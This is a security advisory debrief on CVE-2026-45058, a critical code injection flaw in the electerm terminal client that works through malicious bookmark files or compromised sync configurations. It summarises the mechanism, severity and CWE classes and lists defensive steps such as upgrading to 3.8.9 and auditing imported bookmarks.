PatchSiren cyber security CVE debrief

CVE-2026-45058 electerm CVE debrief

CVE-2026-45058 documents a critical remote code execution vulnerability in electerm, an open-source terminal/SSH/SFTP client. The flaw exists in versions 3.8.8 and earlier, where maliciously crafted bookmark JSON files or compromised sync configurations (Gist/WebDAV) can inject arbitrary commands through exec* fields or global configuration parameters. When a user imports a malicious bookmark or syncs from a compromised source, the injected code executes automatically upon opening the bookmark or applying sync data. The attack vector requires user interaction (importing bookmarks or enabling sync), but no authentication is needed for the payload delivery. The CVSS 4.0 vector indicates network attack vector, low attack complexity, no attack prerequisites, and high impact across confidentiality, integrity, and availability for both the vulnerable component and subsequent systems. The vulnerability is classified under multiple CWE categories including code injection (CWE-94), insufficient verification of data authenticity (CWE-345), download of code without integrity check (CWE-494), and improper control of dynamically-managed code resources (CWE-915).

Vendor: electerm
Product: Unknown
CVSS: CRITICAL 9.4
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-05-28
Original CVE updated: 2026-05-28
Advisory published: 2026-05-28
Advisory updated: 2026-05-28

Who should care

Organizations and individuals using electerm for remote system administration, particularly those leveraging bookmark sharing or synchronization features across multiple workstations. Security teams managing developer tooling and terminal emulator deployments. Users who import bookmark collections from untrusted sources or rely on cloud-based sync for configuration management.

Technical summary

The vulnerability stems from insufficient validation of bookmark and configuration data imported from external sources. Electerm's bookmark format supports exec* fields that specify commands to execute upon connection, and global configuration options that can modify application behavior. The application does not cryptographically verify the integrity or authenticity of imported bookmarks or sync data, allowing an attacker to craft malicious JSON structures that execute arbitrary system commands. The attack surface encompasses two primary vectors: (1) social engineering users into importing malicious bookmark files, and (2) compromising the external sync target (GitHub Gist or WebDAV server) to inject malicious configuration. Upon processing the tainted data, electerm passes unsanitized input to execution contexts, resulting in code execution with the privileges of the electerm process. The CVSS 4.0 score of 9.4 reflects the high impact across all security dimensions despite requiring user interaction for initial access.

Defensive priority

critical

Recommended defensive actions

Upgrade electerm to version 3.8.9 or later which contains the security fix
Audit all imported bookmark JSON files for unexpected exec*, runScripts, or command fields before importing
Review and verify integrity of sync configurations (Gist/WebDAV) before enabling synchronization
Disable automatic sync or bookmark import features if immediate patching is not feasible
Implement application whitelisting or sandboxing for terminal emulator processes where possible
Monitor for unexpected child processes spawned by electerm that may indicate exploitation
Validate bookmark files against a known-good schema that excludes dangerous fields prior to import
Consider network segmentation for systems running electerm to limit lateral movement if compromised

Evidence notes

Official GitHub Security Advisory GHSA-jgg9-rw32-44pj published 2026-05-28 confirms the vulnerability mechanism and affected versions. NVD record published same date with CVSS 4.0 scoring. No known exploitation in the wild as of disclosure date per absence of KEV listing.

Official resources

2026-05-28